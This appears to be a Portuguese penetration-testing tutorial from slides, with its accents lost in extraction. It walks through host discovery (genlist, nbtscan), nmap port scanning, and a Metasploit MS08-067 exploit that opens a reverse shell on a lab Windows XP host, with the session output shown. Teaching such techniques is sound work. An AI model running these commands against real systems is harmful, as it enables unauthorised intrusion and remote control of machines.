Documente Academic
Documente Profesional
Documente Cultură
Capturar telas
Processo de Penteste
Etapa 3
Target Discovery
(Descoberta do Alvo)
Ferramenta ping
Ferramenta usada para verifiicar
determinado HOST est ativo.
se
um
Ferramenta genlist
Ferramenta usada para obter uma lista de
HOSTS atravs de solicitao ping
root@bt:~#genlist s 192.168.56.\*
Ferramenta nbtscan
Ferramenta usada para scanner endereos IP para o
NETBIOS.
Gera um relatrio contendo o endereo IP, nome do
computador no NETBIOS, servio disponivel, registro
de usuarios e endereo MAC
root@bt:~#nbtscan 192.168.56.1-254
Etapa 4
Enumerating Target
(Enumerando o Alvo)
Port Scanning
Ferramenta Autoscan
Ferramenta de rede baseada em graficos que
podem ser usados para encontrar HOSTS
ativos,assim como, portas ,sistema operacional.
Ferramenta nmap
Ferramenta mais utilizada pelos profissionais de TI
para descobertas de portas, sistema operacional,
protocolo (Fingerprint).
Ferramenta nmap
Especificando portas
root@bt:~#nmap -sN -p 22,25,80,3306
192.168.56.101
Apresenta a verso dos servios
root@bt:~#nmap -sV 192.168.56.101
Ferramenta nmap
Ferramenta mais utilizada pelos profissionais de TI
para descobertas de portas, sistema operacional,
protocolo (Fingerprint).
Ferramenta zenmap
GUI da ferramenta nmap
Etapa 7
Target Exploitation
Ferramentas
Exploit: codigo desenvolvido para tirar vantagem de
uma vulnerabilidade do sistema
Payload:codigo malicioso que faz parte de um
Exploit e executa comandos do sistema alvo
Reverse Shell
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 ->
192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>